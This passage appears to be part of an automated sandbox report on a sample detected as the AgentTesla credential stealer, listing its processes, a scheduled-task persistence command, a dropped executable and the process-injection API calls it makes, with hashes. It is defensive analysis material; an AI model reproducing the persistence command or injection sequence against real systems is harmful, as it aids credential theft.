                                                                                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp586D.tmp"
                                                                                                              Imagebase:0xa0000
                                                                                                              File size:187'904 bytes
                                                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:12
                                                                                                              Start time:03:23:29
                                                                                                              Start date:11/01/2025
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:13
                                                                                                              Start time:03:23:29
                                                                                                              Start date:11/01/2025
                                                                                                              Path:C:\Users\user\AppData\Roaming\HHhSyZN.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\HHhSyZN.exe"
                                                                                                              Imagebase:0xbe0000
                                                                                                              File size:835'072 bytes
                                                                                                              MD5 hash:71DBD91C836C0B016174CA9E0A2B848A
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.4150523967.000000000301B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.4150523967.000000000301B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Has exited:false


                                                                                                                Execution Graph

                                                                                                                Execution Coverage:12.5%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0.8%
                                                                                                                Total number of Nodes:237
                                                                                                                Total number of Limit Nodes:12
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1735315394.0000000009D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_9d50000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (o^q$4'^q$4'^q$4'^q
                                                                                                                • API String ID: 0-183542557
                                                                                                                • Opcode ID: 70f53d6db2a7dd3b8f0516f3adf4a792f0921777ac73260f41c3b48689c35d90
                                                                                                                • Instruction ID: c959a4ea79d90abd421de3abab96fee37ee81a589930549b99e88aac8ea97dbd
                                                                                                                • Opcode Fuzzy Hash: 70f53d6db2a7dd3b8f0516f3adf4a792f0921777ac73260f41c3b48689c35d90
                                                                                                                • Instruction Fuzzy Hash: 41530774A41219CFCF24DF68C888A9DB7B2BF49310F158599E95AAB760CB30ED85CF50

                                                                                                                Control-flow Graph

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1735315394.0000000009D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_9d50000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4|cq$4|cq
                                                                                                                • API String ID: 0-1798997883
                                                                                                                • Opcode ID: 960094d3629bc0673188ec6df88818364e1ef54bab3bcc96c9a2c4a78f8eab8b
                                                                                                                • Instruction ID: 7d319c2bbf00a8cc1e58b17d4122762e34eb9a2fe3cee1f3576d85d256bffe43
                                                                                                                • Opcode Fuzzy Hash: 960094d3629bc0673188ec6df88818364e1ef54bab3bcc96c9a2c4a78f8eab8b
                                                                                                                • Instruction Fuzzy Hash: 87C1D235740211CFCF19CF39C494A6ABBB2AF85340B2584A9E856DBB65CB31EC85C7A1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1737717003.000000000F180000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F180000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_f180000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b2b35b9865fc0957e46aed7975bfeca44a1c24afb8b21049653a48dc64a41252
                                                                                                                • Instruction ID: 6f84379e8f701f6895e7d0538ce037f48d23b5f50bbd980419cd62ed478062a4
                                                                                                                • Opcode Fuzzy Hash: b2b35b9865fc0957e46aed7975bfeca44a1c24afb8b21049653a48dc64a41252
                                                                                                                • Instruction Fuzzy Hash: 29E1DE31B017449FDB2AFB76C650BAEB7F6AF99300F24446ED0459B2A1CB35E902CB51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 500b431e5d6bc840465a0ae7f6d19ad2805f8969dbd045e32432aca0f49cdb4b
                                                                                                                • Instruction ID: 83b9677320c78be4f9299e46624ab04c92eb9b9419f07482eae65ccb887af5d1
                                                                                                                • Opcode Fuzzy Hash: 500b431e5d6bc840465a0ae7f6d19ad2805f8969dbd045e32432aca0f49cdb4b
                                                                                                                • Instruction Fuzzy Hash: F851DE6245E7E16FDB476B7C98B40C23FB0AE17264B0A00E7C4C0CF0A7E559588AD7A6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1737717003.000000000F180000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F180000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_f180000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8c71bcf18c2b231fd4f8540c95e55b0d54138fbc614802262c5f13e88fd7cb08
                                                                                                                • Instruction ID: 2f43fbda3d19937ca9c76df7dfd1d300632c664e81a396f9a54baa3aa84d0857
                                                                                                                • Opcode Fuzzy Hash: 8c71bcf18c2b231fd4f8540c95e55b0d54138fbc614802262c5f13e88fd7cb08
                                                                                                                • Instruction Fuzzy Hash: 1511367594921C8FDB24DF64CA80BE8BBB4BB0A300F0541E5D14DA7292D7709A99CF00

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0A04CCA6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: c1486e420f7e29e4574a409fb2daca9c1f60f1c0c6bbc4fb87619e57fcebebcf
                                                                                                                • Instruction ID: 471908ae9a39ad2b9a15177290308ce4c0dddb79c0b47943a60787cc3a0e85a2
                                                                                                                • Opcode Fuzzy Hash: c1486e420f7e29e4574a409fb2daca9c1f60f1c0c6bbc4fb87619e57fcebebcf
                                                                                                                • Instruction Fuzzy Hash: 2BA16AB1D0165D9FEB60CFA9C8417EDBBF2BF48310F0481AAE848A7250DB749985CF91

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0A04CCA6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                APIs
                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 014891B9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1729500262.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1480000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Create
                                                                                                                • String ID:
                                                                                                                • API String ID: 2289755597-0
                                                                                                                APIs
                                                                                                                • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,09D5ADDD,?,?), ref: 09D5AE8F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1735315394.0000000009D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_9d50000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DrawText
                                                                                                                • String ID:
                                                                                                                • API String ID: 2175133113-0
                                                                                                                APIs
                                                                                                                • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,09D5ADDD,?,?), ref: 09D5AE8F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1735315394.0000000009D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_9d50000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DrawText
                                                                                                                • String ID:
                                                                                                                • API String ID: 2175133113-0
                                                                                                                APIs
                                                                                                                • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,09D5ADDD,?,?), ref: 09D5AE8F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1735315394.0000000009D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_9d50000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DrawText
                                                                                                                • String ID:
                                                                                                                • API String ID: 2175133113-0
                                                                                                                APIs
                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0A04C878
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 3559483778-0
                                                                                                                APIs
                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0A04C878
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 3559483778-0
                                                                                                                APIs
                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A04C958
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 1726664587-0
                                                                                                                APIs
                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0A04C6CE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ContextThreadWow64
                                                                                                                • String ID:
                                                                                                                • API String ID: 983334009-0
                                                                                                                APIs
                                                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 09D5EADF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1735315394.0000000009D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_9d50000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FromMonitorPoint
                                                                                                                • String ID:
                                                                                                                • API String ID: 1566494148-0
                                                                                                                APIs
                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A04C958
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 1726664587-0
                                                                                                                APIs
                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0A04C6CE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ContextThreadWow64
                                                                                                                • String ID:
                                                                                                                • API String ID: 983334009-0
                                                                                                                APIs
                                                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 09D5EADF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1735315394.0000000009D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_9d50000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FromMonitorPoint
                                                                                                                • String ID:
                                                                                                                • API String ID: 1566494148-0
                                                                                                                APIs
                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A04C796
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                APIs
                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A04C796
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                APIs
                                                                                                                • ResumeThread.KERNELBASE(?), ref: 0A04C602
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ResumeThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 947044025-0
                                                                                                                APIs
                                                                                                                • PostMessageW.USER32(?,?,?,?), ref: 0F181215
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1737717003.000000000F180000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F180000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_f180000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost
                                                                                                                • String ID:
                                                                                                                • API String ID: 410705778-0
                                                                                                                APIs
                                                                                                                • ResumeThread.KERNELBASE(?), ref: 0A04C602
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ResumeThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 947044025-0
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0148E766
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1729500262.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1480000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                APIs
                                                                                                                • PostMessageW.USER32(?,?,?,?), ref: 0F181215
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1737717003.000000000F180000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F180000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_f180000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost
                                                                                                                • String ID:
                                                                                                                • API String ID: 410705778-0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'^q$TJcq$Te^q$pbq$xbaq
                                                                                                                • API String ID: 0-2576840827
                                                                                                                • Opcode ID: 8439a2e30449139c4cb3e11205039c9dde30782bf9196dcdbd3b79fd2904af8a
                                                                                                                • Instruction ID: 9b754990cfea92bf1a3371425e6ed029426d616fb138d0ab3dbed4f28fc74d80
                                                                                                                • Opcode Fuzzy Hash: 8439a2e30449139c4cb3e11205039c9dde30782bf9196dcdbd3b79fd2904af8a
                                                                                                                • Instruction Fuzzy Hash: C6B2C175E00228DFDB64CF69C984AD9BBB2FF89304F1581E9D509AB225DB359E81CF40
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: TJcq$Te^q$xbaq
                                                                                                                • API String ID: 0-3225726259
                                                                                                                • Opcode ID: 3f0ef0871bebefecf69060c32fb22e18bfcaeece973d2243d8bcef8d2ce5cc09
                                                                                                                • Instruction ID: 4a815b1d561ee5b00f958c8fe4071f1cd838e4650e641677fd9d2d21f2f444cd
                                                                                                                • Opcode Fuzzy Hash: 3f0ef0871bebefecf69060c32fb22e18bfcaeece973d2243d8bcef8d2ce5cc09
                                                                                                                • Instruction Fuzzy Hash: A4C182B5E016188FDB58CF6AC9446DDBBF2BF89300F14C1EAD909AB325DA345E858F50
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1729500262.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1480000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: y
                                                                                                                • API String ID: 0-1623555479
                                                                                                                • Opcode ID: c1fbd0c4e92e238e7f86f37d2e922306eeb6a9ab30477159457da89902d76c2a
                                                                                                                • Instruction ID: 0e234208b6f148ab921965530f82942c93616898569fa1c63f7cbf20e1bf53dc
                                                                                                                • Opcode Fuzzy Hash: c1fbd0c4e92e238e7f86f37d2e922306eeb6a9ab30477159457da89902d76c2a
                                                                                                                • Instruction Fuzzy Hash: C541C471704645CFC750DA6DD881E6BBBF2FB84210B24882BE82AC7760D2B0E942CF01
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5539e079cae56cd4ca14ec5efedee299ae596e0fcc0143b9bd9113d06792ddf5
                                                                                                                • Instruction ID: bdb26f066d94f058170bed9a1524ef8b68f6d9f4a8d0e4977cd77287eeac644b
                                                                                                                • Opcode Fuzzy Hash: 5539e079cae56cd4ca14ec5efedee299ae596e0fcc0143b9bd9113d06792ddf5
                                                                                                                • Instruction Fuzzy Hash: 54E1F7B4E102198FCB14CFA9C5809AEFBB2FF89305F248169E415AB356D735AD41CF61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: da6d968408c96d53a175b7ae869bd0836a738e71023d7c019a8c549b184c03da
                                                                                                                • Instruction ID: b9d2c1c74290a77a2289022d904540957d5455847d6ff81403cfafda9b7e97b2
                                                                                                                • Opcode Fuzzy Hash: da6d968408c96d53a175b7ae869bd0836a738e71023d7c019a8c549b184c03da
                                                                                                                • Instruction Fuzzy Hash: B8E1D8B4E102198FCB14CFA9C5809AEBBF2FF89305F248169E415AB356DB35AD41CF61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 641bb486777857c6f83d6a3ee2bedc980b5ccbbb92182e308acc5b57a11a2b20
                                                                                                                • Instruction ID: 4f95a531be40b4cf2bbd1f84698e29b53ea7fac5ebdcf174c94d0938913103e5
                                                                                                                • Opcode Fuzzy Hash: 641bb486777857c6f83d6a3ee2bedc980b5ccbbb92182e308acc5b57a11a2b20
                                                                                                                • Instruction Fuzzy Hash: EAE1E7B4E111198FDB14CFA9C5809AEBBF2FF89305F248169E419AB356D730AD41CFA0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: eacaf1ba1978c1f5779211fcf1a750805c8a0d3eb6f566a88a7f418bf221ad6c
                                                                                                                • Instruction ID: a1b93e8f399288897c0208cf71f3dc810b525d341dd21260a628d15a14c98c3d
                                                                                                                • Opcode Fuzzy Hash: eacaf1ba1978c1f5779211fcf1a750805c8a0d3eb6f566a88a7f418bf221ad6c
                                                                                                                • Instruction Fuzzy Hash: 8DE1F6B4E112198FDB14CFA9C5809AEBBF2FF89305F248169E415AB356D734AD41CFA0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: beb5a5d1f4ae8c2bcf119e1c564f35b895aa7180bd48ac8ae9cb02b5ee128853
                                                                                                                • Instruction ID: 35b5b266fd497ff34f054a435b1eaad2891727e122ee8a35f2157692491e5d98
                                                                                                                • Opcode Fuzzy Hash: beb5a5d1f4ae8c2bcf119e1c564f35b895aa7180bd48ac8ae9cb02b5ee128853
                                                                                                                • Instruction Fuzzy Hash: 59E1E5B4E102198FCB14CFA9C5809AEBBF2FF89305F248169E415AB356D734AD42CF61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2169d14cd030c6e94d774ef94fab2d8dd3ab3c45c1a0ea448f907d4750308016
                                                                                                                • Instruction ID: df78497803715fcaf4e4b613fd613945371397f583fada9f055bf194162c747d
                                                                                                                • Opcode Fuzzy Hash: 2169d14cd030c6e94d774ef94fab2d8dd3ab3c45c1a0ea448f907d4750308016
                                                                                                                • Instruction Fuzzy Hash: E2A1C2B4E0422CDBDB24CFAAC8447EDBBF6BF89300F10916AE509A7251DB745985CF40
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1729500262.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1480000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6d5360cd5dfa18f1db17d5e098a0f4dc7df7c3dcc247ce86a9a31b9e76846306
                                                                                                                • Instruction ID: 929d6ef87b825a70fe8f7c4eb702be6cc2a13b40a592c9bd3304d01f2f7062a4
                                                                                                                • Opcode Fuzzy Hash: 6d5360cd5dfa18f1db17d5e098a0f4dc7df7c3dcc247ce86a9a31b9e76846306
                                                                                                                • Instruction Fuzzy Hash: 5D71D071E1420A8FCB40EFA8C8815AEFBF5FB89610B55C16BD41AEB261D274DD42CB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3b70ea61fded9fcdeda2d2b1dc8e3022bd5e138b69ba08f0d2765a8b5a810c02
                                                                                                                • Instruction ID: 04167074e129d24bcc4815d8e265418139ceb34fffde7957c63e00cf834f91b9
                                                                                                                • Opcode Fuzzy Hash: 3b70ea61fded9fcdeda2d2b1dc8e3022bd5e138b69ba08f0d2765a8b5a810c02
                                                                                                                • Instruction Fuzzy Hash: A8512AB0E102198FCB14CFA9C5805AEFBF2FF8A304F24C1A9D458A7256D731A942CF60
                                                                                                                Memory Dump Source
